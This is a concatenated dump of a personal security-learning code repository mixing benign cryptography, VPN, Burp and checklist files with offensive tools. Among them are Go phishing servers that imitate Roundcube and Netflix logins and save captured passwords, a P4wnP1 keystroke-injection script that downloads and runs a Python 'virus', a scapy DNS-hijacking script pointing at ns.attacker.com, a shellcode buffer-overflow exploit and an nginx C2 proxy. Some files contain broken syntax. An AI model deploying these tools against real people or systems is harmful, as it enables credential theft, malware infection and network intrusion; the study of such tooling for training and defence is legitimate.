| # run with: 6 | # docker run -d -p 443:443 --name nginx-c2-proxy nginx-c2-proxy 7 | ####################################### 8 | FROM nginx:alpine 9 | 10 | RUN apk update && \ 11 | apk add --no-cache openssl && \ 12 | rm -rf "/var/cache/apk/*" 13 | 14 | RUN openssl req -x509 -nodes -days 365 -newkey rsa:4096 \ 15 | -keyout /etc/ssl/private/nginx.key \ 16 | -out /etc/ssl/certs/nginx.crt \ 17 | -subj "/C=US/O=Mega Corp" 18 | 19 | RUN set -x ; \ 20 | addgroup -g 82 -S www-data ; \ 21 | adduser -u 82 -D -S -G www-data www-data && exit 0 22 | 23 | COPY --chown=www-data:www-data index.html /var/www/html/ 24 | COPY *.conf /etc/nginx/conf.d/ 25 | 26 | RUN rm 2>/dev/null /etc/nginx/sites-enabled/default || true 27 | RUN rm 2>/dev/null /etc/nginx/conf.d/default.conf || true 28 | 29 | EXPOSE 443 30 | 31 | CMD nginx -g "daemon off;" 32 | -------------------------------------------------------------------------------- /Burp/CustomActions/DetectOpenCORSPolicy.java: -------------------------------------------------------------------------------- 1 | public String collaborator = api().collaborator().defaultPayloadGenerator().generatePayload().toString(); 2 | HttpRequest modifiedRequest = requestResponse.request().withRemovedHeader("Origin").withAddedHeader("Origin", collaborator); 3 | HttpResponse resp = api().http().sendRequest(modifiedRequest).response(); 4 | 5 | String ACAC = "Access-Control-Allow-Credentials"; 6 | String ACAO = "Access-Control-Allow-Origin"; 7 | String returnedAccessControlAllowOrigin = ""; 8 | 9 | // check if ACAO and ACAC and that ACAC is set to true 10 | if (resp.hasHeader(ACAO) && resp.hasHeader(ACAC) && resp.headerValue(ACAC).toLowerCase().equals("true")) { 11 | returnedAccessControlAllowOrigin = resp.header("Access-Control-Allow-Origin").value(); 12 | if (returnedAccessControlAllowOrigin.equals(collaborator) || returnedAccessControlAllowOrigin.equals("*")) { 13 | logging.logToOutput("[+] open CORS policy identified - the CORS policy reflects the injected payload or returns wildcard"); 14 | } 15 | } -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Roundcube/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | "time" 7 | "os" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | func login(w http.ResponseWriter, r *http.Request) { 13 | username := r.FormValue("_user") 14 | password := r.FormValue("_pass") 15 | fmt.Printf("Time: %s\n", time.Now().String()) 16 | fmt.Printf("Username: %s\n", username) 17 | fmt.Printf("Password: %s\n", password) 18 | 19 | f, err := os.OpenFile("creds.txt", os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0600) 20 | defer f.Close() 21 | if err != nil { 22 | panic(err) 23 | } 24 | 25 | out := fmt.Sprintf("Time: %s, Username: %s, Password: %s\n", time.Now().String(), username, password) 26 | _, err = f.WriteString(out) 27 | 28 | http.Redirect(w, r, "/", 302) 29 | } 30 | 31 | func main() { 32 | r := mux.NewRouter() 33 | r.HandleFunc("/login", login).Methods("POST") 34 | r.PathPrefix("/").Handler(http.FileServer(http.Dir("public"))) 35 | http.ListenAndServe("127.0.0.1:8080", r) 36 | } -------------------------------------------------------------------------------- /SecureCodeReview/README.md: -------------------------------------------------------------------------------- 1 | # Secure Code Review 2 | 3 | This folder will contain notes/resources on secure code review. 4 | 5 | ### External Resources 6 | 7 | - [Secure Code Review Checklist](https://github.com/mgreiler/secure-code-review-checklist/blob/main/README.md) 8 | - [Secure Coding Practices Checklist](https://github.com/RedHatInsights/secure-coding-checklist/blob/master/README.md) 9 | - [C/C++ Secure Code Checklist](https://en.opensuse.org/SDB:Secure_coding_checklist:_C_and_C%2B%2B) 10 | - [Python Security Best Practices (Snyk)](https://snyk.io/blog/python-security-best-practices-cheat-sheet/) 11 | - [Java Secure Coding Guidelines](https://www.oracle.com/java/technologies/javase/seccodeguide.html) 12 | - [Go Secure Coding Practices PDF (OWASP)](https://github.com/OWASP/Go-SCP/blob/master/dist/go-webapp-scp.pdf) 13 | - [Vicki Li's "How to Analyze Code for Vulnerabilities" Talk](https://www.youtube.com/watch?v=A8CNysN-lOM) 14 | - [Ken Johnson & Seth Law: "Secure-er Code Reviews" Talk](https://www.youtube.com/watch?v=89rSpNBtVWE) 15 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/CredentialHarvester/Netflix/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | "os" 7 | "time" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | func login(w http.ResponseWriter, r *http.Request) { 13 | username := r.FormValue("userLoginId") 14 | password := r.FormValue("password") 15 | fmt.Printf("Time: %s\n", time.Now().String()) 16 | fmt.Printf("Username: %s\n", username) 17 | fmt.Printf("Password: %s\n", password) 18 | 19 | f, err := os.OpenFile("creds.txt", os.O_CREATE|os.O_APPEND|os.O_WRONLY, 0600) 20 | defer f.Close() 21 | if err != nil { 22 | panic(err) 23 | } 24 | 25 | out := fmt.Sprintf("Time: %s, Username: %s, Password: %s\n", time.Now().String(), username, password) 26 | _, err = f.WriteString(out) 27 | 28 | http.Redirect(w, r, "/", 302) 29 | } 30 | 31 | func main() { 32 | r := mux.NewRouter() 33 | r.HandleFunc("/login", login).Methods("POST") 34 | r.PathPrefix("/").Handler(http.FileServer(http.Dir("netflix"))) 35 | http.ListenAndServe("127.0.0.1:8080", r) 36 | } 37 | -------------------------------------------------------------------------------- /PhysicalPentestStuff/P4wnP1/HIDscripts/infectWithPythonVirus.js: -------------------------------------------------------------------------------- 1 | language = "us"; 2 | 3 | function enter() { press("ENTER"); } 4 | 5 | function downloadPyVirus() { 6 | // make temp directory in c:\ to store reverse shell script 7 | type("mkdir C:\\Temp"); 8 | enter(); 9 | delay(200); 10 | // download reverse shell script from Nishang repository 11 | type("IWR 'https://raw.githubusercontent.com/binexisHATT/EthicalHacking/master/PyMalware/PyBackdoorInjection/infect_pyfiles.py' -UseBasicParsing -OutFile 'C:\\Temp\\v.py'"); 12 | enter(); 13 | delay(200); 14 | } 15 | 16 | function executeVirus() { 17 | type("cmd.exe /c 'C:\\Temp\\v.py'); 18 | enter(); 19 | } 20 | 21 | /********************************************************/ 22 | 23 | // keyboard layout 24 | layout(language); 25 | 26 | // emulate someone pressing Windows key + R to run programs 27 | press("WIN R"); 28 | delay(200); 29 | 30 | // open a powershell window 31 | type("powershell"); 32 | enter(); 33 | delay(500); 34 | 35 | downloadPyVirus(); 36 | executeVirus(); 37 | -------------------------------------------------------------------------------- /Misc/DNSAttacks/hijack_entire_domain.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | # flush DNS cache: ipconfig /flushdns 4 | 5 | def hijack_domain(pkt): 6 | """Hijack the entire `example.com` domain""" 7 | if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')): 8 | print("Spoofing DNS reply for DNS query for `example.com`") 9 | ip = IP(src=pkt[IP].dst, dst=pkt[IP].src) 10 | udp = UDP(sport=53, dport=pkt[UDP].sport) 11 | 12 | ANssec = DNSRR( 13 | rrname=pkt[DNS].qd.qname, type='A', 14 | rdata='1.2.3.4', ttl=259200 15 | ) 16 | NSsec = DNSRR( 17 | rrname="example.com", type="NS", 18 | ttl=259200, rdata='ns.attacker.com' 19 | ) 20 | dns = DNS( 21 | id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, 22 | qr=1, qdcount=1, ancount=1, an=ANssec 23 | ) 24 | 25 | spoofpkt = ip/udp/dns 26 | send(spoofpkt, verbose=0) 27 | 28 | if __name__ == "__main__": 29 | sniff(filter="udp", prn=hijack_domain) -------------------------------------------------------------------------------- /OffensiveGo/HTTPClients/requests_json_api.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | ) 8 | 9 | // ExampleJsonResponse defines a struct to the rest api @/todos/1 10 | type ExampleJsonResponse struct { 11 | UserId int 12 | Id int 13 | Title string 14 | Completed bool 15 | } 16 | 17 | func main() { 18 | // Rest API for testing 19 | resp, err := http.Get("https://jsonplaceholder.typicode.com/todos/1") 20 | defer resp.Body.Close() 21 | if err != nil { 22 | panic(resp) 23 | } 24 | 25 | var jsonResponse ExampleJsonResponse 26 | 27 | // Using ```json.NewDecoder``` to invokde ```Decode method``` 28 | // for parsing JSON response into the ExampleJsonResponse struct variable 29 | if err := json.NewDecoder(resp.Body).Decode(&jsonResponse); err != nil { 30 | panic(err) 31 | } 32 | 33 | fmt.Printf("UserId : %d\n", jsonResponse.UserId) 34 | fmt.Printf("Id : %d\n", jsonResponse.Id) 35 | fmt.Printf("Title : %s\n", jsonResponse.Title) 36 | fmt.Printf("Completed : %t\n", jsonResponse.Completed) 37 | } 38 | -------------------------------------------------------------------------------- /Misc/CustomBurpExtensions/BurpAddXForwardedFor.py: -------------------------------------------------------------------------------- 1 | from burp import IBurpExtender 2 | from burp import ISessionHandlingAction 3 | 4 | class BurpExtender(IBurpExtender, ISessionHandlingAction): 5 | 6 | def registerExtenderCallbacks(self, callbacks): 7 | self._callbacks = callbacks 8 | self._helpers = callbacks.getHelpers() 9 | callbacks.setExtensionName("Add X-Forwarded-For Header") 10 | callbacks.registerSessionHandlingAction(self) 11 | return 12 | 13 | def getActionName(self): 14 | return None 15 | 16 | def performAction(self, currentRequest, macroItems): 17 | requestInfo = self._helpers.analyzeRequest(currentRequest) 18 | headers = requestInfo.getHeaders() 19 | msgBody = currentRequest.getRequest()[requestInfo.getBodyOffset():] 20 | headers.add("X-Forwarded-For: 192.168.4.28") 21 | message = self._helpers.buildHttpMessage(headers, msgBody) 22 | print(self._helpers.bytesToString(message)) 23 | currentRequest.setRequest(message) 24 | return 25 | 26 | -------------------------------------------------------------------------------- /SecureCodeReview/code-samples/sample.1.js: -------------------------------------------------------------------------------- 1 | /* Can you spot the vulnerability?? */ 2 | 3 | const express = require('express'); 4 | const User = require('../models/User'); 5 | const bcrypt = require('bcrypt'); 6 | 7 | const router = express.Router(); 8 | 9 | router.post("/register", async (req, res) => { 10 | const { full_name, email, passwd } = res.body; 11 | 12 | if (!(full_name && email && passwd)) { 13 | return res.json("missing fields"); 14 | } 15 | 16 | try { 17 | const userExists = await User.findOne({ email: email }); 18 | if (userExists) { 19 | return res.json({error: "user exists. redirecting to login"}); 20 | } 21 | 22 | passwdHash = await bcrypt.hash(passwd, 10); 23 | const user = await User.create({ 24 | full_name: full_name, 25 | email: email.toLowerCase(), 26 | passwd: passwdHash 27 | }); 28 | 29 | return res.json({ full_name, email, createdAt: user.createdAt }); 30 | 31 | } catch (err) { 32 | return res.json(err); 33 | } 34 | }); 35 | 36 | module.exports = router; 37 | -------------------------------------------------------------------------------- /Misc/VPNCreation/tun_interface.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from fcntl import ioctl 3 | from struct import pack 4 | from scapy.all import * 5 | from os import read, write, open, O_RDWR 6 | from subprocess import run 7 | 8 | TUNSETIFF = 0x400454ca 9 | IFF_TUN = 0x0001 10 | IFF_TAP = 0x0002 11 | IFF_NO_PI = 0x1000 12 | 13 | def main(): 14 | tun = open("/dev/net/tun", O_RDWR) 15 | ifr = pack("16sH", b"tun%d", IFF_TUN | IFF_NO_PI) 16 | ifname_bytes = ioctl(tun, TUNSETIFF, ifr) 17 | ifname = ifname_bytes.decode("UTF-8")[:16].strip("\x00") 18 | run(f"ip addr add 192.168.53.100/24 dev {ifname}", shell=True) 19 | run(f"ip link set dev {ifname} up", shell=True) 20 | print(f"VPN TUN INTERFACE: {ifname}") 21 | 22 | 23 | while True: 24 | packet = read(tun, 2048) 25 | if True: 26 | ip = IP(packet) 27 | ip.show() 28 | 29 | newip = IP(src="1.2.3.4", dst=ip.src) 30 | newpkt = newip/ip.payload 31 | write(tun, bytes(newpkt)) 32 | 33 | if __name__ == "__main__": 34 | main() 35 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/prog_args.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | 3 | def parse_args(): 4 | parser=ArgumentParser( 5 | description="Twitter Trending Cyber News or Vulnerabilities Crawler" 6 | ) 7 | parser.add_argument( 8 | "-q", "--query", 9 | type=str, nargs="+", 10 | metavar="[SearchTerm]", 11 | help="The keyword/s to search for" 12 | ) 13 | parser.add_argument( 14 | "-a", "--auth-file", metavar="FILENAME", 15 | help="JSON file containing Google Sheets API identity info" 16 | ) 17 | parser.add_argument( 18 | "-k", "--url-key", metavar="KEY", 19 | help="The random key found within the URL of the google sheets doc" 20 | ) 21 | parser.add_argument( 22 | "-c", "--count", 23 | type=int, 24 | help="The number of tweets to search for" 25 | ) 26 | parser.add_argument( 27 | "-s", "--console", 28 | action="store_true", 29 | help="Print results to console" 30 | ) 31 | 32 | return parser.parse_args() 33 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/cbc_image_encryption.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from sys import argv, exit 4 | from secrets import token_bytes 5 | 6 | if __name__ == "__main__": 7 | if len(argv) < 3: 8 | print(f"Usage: python3 {__file__} quote.bmp [outfile_name].bmp") 9 | exit(1) 10 | 11 | key: bytes = token_bytes(32) 12 | iv: bytes = token_bytes(16) 13 | cipher = Cipher( 14 | algorithms.AES(key), 15 | modes.CBC(iv), 16 | backend=default_backend() 17 | ) 18 | encryptor = cipher.encryptor() 19 | 20 | i_f, o_f = argv[1:3] 21 | with open(i_f, "rb") as reader: 22 | with open(o_f, "wb+") as writer: 23 | data = reader.read() 24 | header, body = data[:54], data[54:] 25 | body += b"\x00" * (16-(len(body)%16)) 26 | encrypted_body = encryptor.update(body) 27 | writer.write(header+encrypted_body) 28 | -------------------------------------------------------------------------------- /Cryptography/MsgIntegritySignaturesCertificates/mac.py: -------------------------------------------------------------------------------- 1 | from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes 2 | from cryptography.hazmat.backends import default_backend 3 | from secrets import token_bytes 4 | from hashlib import sha256 5 | 6 | class Encryptor: 7 | 8 | def __init__(self, key, nonce): 9 | aes_ctr = Cipher( 10 | algorithms.AES(key), modes.CTR(nonce), backend=default_backend() 11 | ) 12 | self.encryptor = aes_ctr.encryptor() 13 | self.hasher = sha256() 14 | 15 | def update_encryptor(self, plaintext): 16 | ciphertext = self.encryptor.update(plaintext) 17 | self.hasher.update(ciphertext) 18 | return ciphertext 19 | 20 | def finalize(self): 21 | return self.encryptor.finalize() + self.hasher.digest() 22 | 23 | if __name__ == "__main__": 24 | key = token_bytes(32) 25 | nonce = token_bytes(16) 26 | E = Encryptor(key, nonce) 27 | ciphertext = E.update_encryptor(b"This is a message") 28 | ciphertext += E.finalize() 29 | print(ciphertext) 30 | 31 | 32 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/exploit_notesearch.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char shellcode[]= 6 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 7 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 8 | "\xe1\xcd\x80"; 9 | 10 | int main(int argc, char *argv[]) 11 | { 12 | unsigned int i, *ptr, ret, offset=270; 13 | char *command, *buffer; 14 | 15 | command=(char *) malloc(200); 16 | bzero(command, 200); // Zero out the new memory. 17 | strcpy(command, "./notesearch \'"); // Start command buffer. 18 | buffer=command + strlen(command); // Set buffer at the end. 19 | 20 | if(argc > 1) // Set offset. 21 | offset=atoi(argv[1]); 22 | ret=(unsigned int) &i - offset; // Set return address. 23 | for(i=0; i < 160; i+=4) // Fill buffer with return address. 24 | *((unsigned int *)(buffer+i)) = ret; 25 | memset(buffer, 0x90, 60); // Build NOP sled. 26 | memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 27 | strcat(command, "\'"); 28 | system(command); // Run exploit. 29 | free(command); 30 | } 31 | -------------------------------------------------------------------------------- /Misc/WindowsRegistry/enumerate_registry_hive.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from winreg import ( 3 | HKEY_CURRENT_USER, 4 | KEY_ALL_ACCESS, 5 | ConnectRegistry, 6 | OpenKey, 7 | EnumValue, 8 | EnumKey, 9 | QueryInfoKey 10 | ) 11 | 12 | from ctypes import ( 13 | windll, 14 | c_long, 15 | byref 16 | ) 17 | 18 | def get_key_values(key): 19 | num_key_values = QueryInfoKey(key)[1] 20 | for i in range(num_key_values): 21 | print("[{}, {}, {}]".format(*EnumValue(key, i))) 22 | 23 | def get_subkeys(key): 24 | j = 0 25 | while True: 26 | try: 27 | yield EnumKey(key, j) 28 | j += 1 29 | except WindowsError: break 30 | 31 | def enumerate_registry_hive(top_registry_key, subkey=None): 32 | with ConnectRegistry(None, top_registry_key) as key: 33 | for subkey in get_subkeys(key): 34 | opened_key = OpenKey(top_registry_key, subkey, 0, KEY_ALL_ACCESS) 35 | get_key_values(opened_key) 36 | 37 | if subkey not None: 38 | 39 | subkey = f"{}" 40 | #enumerate_registry_hive(top_registry_key, subkey=subkey) 41 | 42 | if __name__ == "__main__": 43 | enumerate_registry_hive(HKEY_CURRENT_USER) -------------------------------------------------------------------------------- /Misc/VPNCreation/tap_interface.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from fcntl import ioctl 3 | from struct import pack 4 | from os import read, write, open, O_RDWR 5 | from scapy.all import * 6 | from subprocess import run 7 | 8 | TUNSETIFF = 0x400454ca 9 | IFF_TUN = 0x0001 10 | IFF_TAP = 0x0002 11 | IFF_NO_PI = 0x1000 12 | 13 | def main(): 14 | tun = os.open("/dev/net/tun", O_RDWR) 15 | ifr = pack("16sH", b"tap%d", IFF_TAP | IFF_NO_PI) 16 | ifname_bytes = ioctl(tun, TUNSETIFF, ifr) 17 | ifname = ifname_bytes.decode("UTF-8")[:16].strip("\x00") 18 | print(f"VPN TAP INTERFACE: {ifname}") 19 | 20 | run(f"ip addr add 192.168.22.50/24 dev {ifname}", shell=True) 21 | run(f"ip link set dev {ifname} up", shell=True) 22 | 23 | while True: 24 | packet = read(tun, 2048) 25 | if True: 26 | ether = Ether(packet) 27 | ether.show() 28 | 29 | newether = Ether(src="aa:bb:cc:aa:bb:cc", dst=ether.src) 30 | newpkt = newether/ether.payload 31 | write(tun, bytes(newpkt)) 32 | 33 | if __name__ == "__main__": 34 | main() 35 | 36 | -------------------------------------------------------------------------------- /OffensiveGo/EchoServer/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io" 6 | "log" 7 | "net" 8 | ) 9 | 10 | func echo(conn net.Conn) { 11 | defer conn.Close() 12 | 13 | data := make([]byte, 512) 14 | 15 | for { 16 | i, err := conn.Read(data[0:]) 17 | if err == io.EOF { 18 | log.Println("[-] Connection has been terminated") 19 | break 20 | } 21 | if err != nil { 22 | log.Fatalln("[-] An error occured while reading from connection") 23 | break 24 | } 25 | 26 | fmt.Printf("Received %d bytes:\n%s", i, string(data)) 27 | 28 | if _, err = conn.Write(data[0:i]); err != nil { 29 | log.Fatalln("[-] An error occured writing to connection") 30 | } 31 | } 32 | } 33 | 34 | func main() { 35 | listener, err := net.Listen("tcp", "127.0.0.1:1337") 36 | if err != nil { 37 | log.Fatalln("Unable to create listener on port 127.0.0.1:1337") 38 | } 39 | fmt.Println("[+] Listening on 127.0.0.1:1337") 40 | 41 | for { 42 | conn, err := listener.Accept() 43 | if err != nil { 44 | log.Fatalln("Unable to receive connection from client") 45 | } 46 | go echo(conn) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /AmazonWebServices/security-services/README.md: -------------------------------------------------------------------------------- 1 | # AWS Security Services Overview 2 | 3 | I'll be adding more information for each service in the near future 4 | 5 | ### Identity & Access Management 6 | 7 | |Service Name|Description| 8 | |---|---| 9 | |IAM|| 10 | |Cognito|| 11 | |Directory Service|| 12 | |Resource Access Manager|| 13 | |Organizations|| 14 | 15 | ### Detection 16 | 17 | |Service Name|Description| 18 | |---|---| 19 | |Security Hub|| 20 | |GuardDuty|| 21 | |Inspector|| 22 | |Config|| 23 | |CloudTrail|| 24 | |IoT Device Defender|| 25 | 26 | ### Network and application protection 27 | 28 | |Service Name|Description| 29 | |---|---| 30 | |Network Firewall|| 31 | |Shield|| 32 | |Route 53 Resolver DNS Firewall|| 33 | |Web Application Firewall (WAF)|| 34 | |Firewall Manager|| 35 | 36 | ### Data Protection 37 | 38 | |Service Name|Description| 39 | |---|---| 40 | |Amazon Macie|| 41 | |Key Management Service (KMS)|| 42 | |CloudHSM|| 43 | |Certificate Manager|| 44 | |Secrets Manager|| 45 | 46 | ### Incident Response 47 | 48 | |Service Name|Description| 49 | |---|---| 50 | |Amazon Detective|| 51 | |Elastic Disaster Recovery|| 52 | -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello.nasm: -------------------------------------------------------------------------------- 1 | ; Author : Alexis Rodriguez 2 | ; Date : 06/28/2020 3 | ; File : hello.asm 4 | ; IS : IA-32 5 | 6 | global _start ; use _start as the entry point into the program, similar to main function 7 | 8 | ; the .text section contains the body of our code 9 | section .text 10 | _start: 11 | ; print hello world to stdout 12 | mov eax, 0x4 ; system call, write 13 | mov ebx, 0x1 ; file descriptor 1, stdout 14 | mov ecx, message ; move address of message variable into ecx reg. 15 | mov edx, mlen ; compute the message length 16 | int 0x80 ; invoke system call 17 | 18 | ; exiting program 19 | mov eax, 0x1 ; system call, exit 20 | mov ebx, 0x5 ; return 5 after running 21 | int 0x80 ; invoke system call 22 | 23 | ; the .data section all initialized data 24 | section .data 25 | message: db "Hello World!" ; defining data that will be used in program 26 | mlen: equ $-message ; store the length of 'message' in mlen 27 | 28 | ; running program 29 | ; nasm -f elf32 -o hello.o hello.asm 30 | ; ld -m elf_i386 -s -o hello hello.o 31 | ; echo $? to check if program returned 5 as expected (line 20) -------------------------------------------------------------------------------- /Cryptography/AsymmetricEncryption/homomorphic_rsa.py: -------------------------------------------------------------------------------- 1 | from rsa import RSA 2 | from gmpy2 import powmod, invert 3 | 4 | def rsa_encrypt(plaintext, publickey): 5 | nums = publickey.public_numbers() 6 | return powmod(plaintext, nums.e, nums.n) 7 | 8 | def rsa_decrypt(ciphertext, privatekey): 9 | nums = privatekey.private_numbers() 10 | return powmod(ciphertext, nums.d, nums.public_numbers.n) 11 | 12 | if __name__ == "__main__": 13 | manager = RSA(public_exponent=65537, key_size=2048) 14 | 15 | private_key = manager.private_key 16 | public_key = manager.public_key 17 | 18 | n = public_key.public_numbers().n 19 | a = 5 20 | b = 10 21 | 22 | encrypted_a = rsa_encrypt(a, public_key) 23 | encrypted_b = rsa_encrypt(b, public_key) 24 | 25 | # mutiplying the encrypted value of a with the 26 | # encrypted value of b, to obtain the product of 27 | # both encrypted values 28 | encrypted_product = (encrypted_a * encrypted_b) % n 29 | # getting the product of the two plaintext values 30 | product = rsa_decrypt(encrypted_product, private_key) 31 | 32 | print(f"{a} x {b} = {product}") 33 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("CSharpAES")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("CSharpAES")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("CSharpAES")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/emailer.py: -------------------------------------------------------------------------------- 1 | from smtplib import SMTP_SSL 2 | from ssl import create_default_context 3 | 4 | class Emailer(): 5 | def __init__(self, smtp_server, smtp_port): 6 | self.smtp_server = smtp_server 7 | self.smtp_port = smtp_port 8 | 9 | def __enter__(self): 10 | context = create_default_context() 11 | self.server = SMTP_SSL(self.smtp_server, self.smtp_port, context=context) 12 | return self 13 | 14 | def __exit__(self, exc_type, exc_val, exc_tb): 15 | self.server.quit() 16 | return False 17 | 18 | def authenticate(self, sender_email, password): 19 | self.sender_email = sender_email 20 | try: 21 | self.server.login(self.sender_email, password) 22 | except: 23 | return False 24 | return True 25 | 26 | def send(self, recipient_email, subject, msg): 27 | # Using RFC822 email string 28 | msg = f"Subject:{subject}\n\n{msg}" 29 | try: 30 | self.server.sendmail(self.sender_email, recipient_email, msg) 31 | except: 32 | return False 33 | return True 34 | 35 | -------------------------------------------------------------------------------- /Containerization/kubernetes/top-10-security-best-practices-checklist/README.md: -------------------------------------------------------------------------------- 1 | # Top 10 Kubernetes Security Best Practices Checklist 2 | 3 | - [ ] Image Scanning 4 | - perform image scanning to detect malicious images attempting to infiltrate deployments 5 | - use static security and vulnerability scanning tools such as `docker scan` which leverages Snyk, Clair, Anchore, Qualys, etc 6 | - [ ] Avoid Using Root User 7 | - users with the least amount of privileges required to perform a function should be created to execute containerized applications 8 | - helps prevent against common container breakout techniques 9 | - `RUN groupadd -r app && useradd -g app appuser` 10 | - `RUN chown -R appuser:app /app` 11 | - `USER appuser` 12 | - [ ] Users & Permissions with Role-based Access Controls (RBAC) 13 | - [ ] Use Network Policies 14 | - [ ] Encrypt Communication 15 | - [ ] Secure Secrets 16 | - [ ] Secure etcd 17 | - [ ] Automated Backup & Restore 18 | - [ ] Configure Security Policies 19 | - [ ] Disaster Recovery 20 | 21 | #### References 22 | 23 | - [TechWorld with Nana Kubernetes Security Best Practices Video](https://www.youtube.com/watch?v=oBf5lrmquYI) 24 | -------------------------------------------------------------------------------- /Cryptography/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 zeugirdoR sixelA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 zeugirdoR sixelA 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /OffensiveGo/DNS/DNSExfiltration/go.sum: -------------------------------------------------------------------------------- 1 | github.com/alexflint/go-arg v1.4.3 h1:9rwwEBpMXfKQKceuZfYcwuc/7YY7tWJbFsgG5cAU/uo= 2 | github.com/alexflint/go-arg v1.4.3/go.mod h1:3PZ/wp/8HuqRZMUUgu7I+e1qcpUbvmS258mRXkFH4IA= 3 | github.com/alexflint/go-scalar v1.1.0 h1:aaAouLLzI9TChcPXotr6gUhq+Scr8rl0P9P4PnltbhM= 4 | github.com/alexflint/go-scalar v1.1.0/go.mod h1:LoFvNMqS1CPrMVltza4LvnGKhaSpc3oyLEBUZVhhS2o= 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/davecgh/go-spew v1.1.1/go.mod 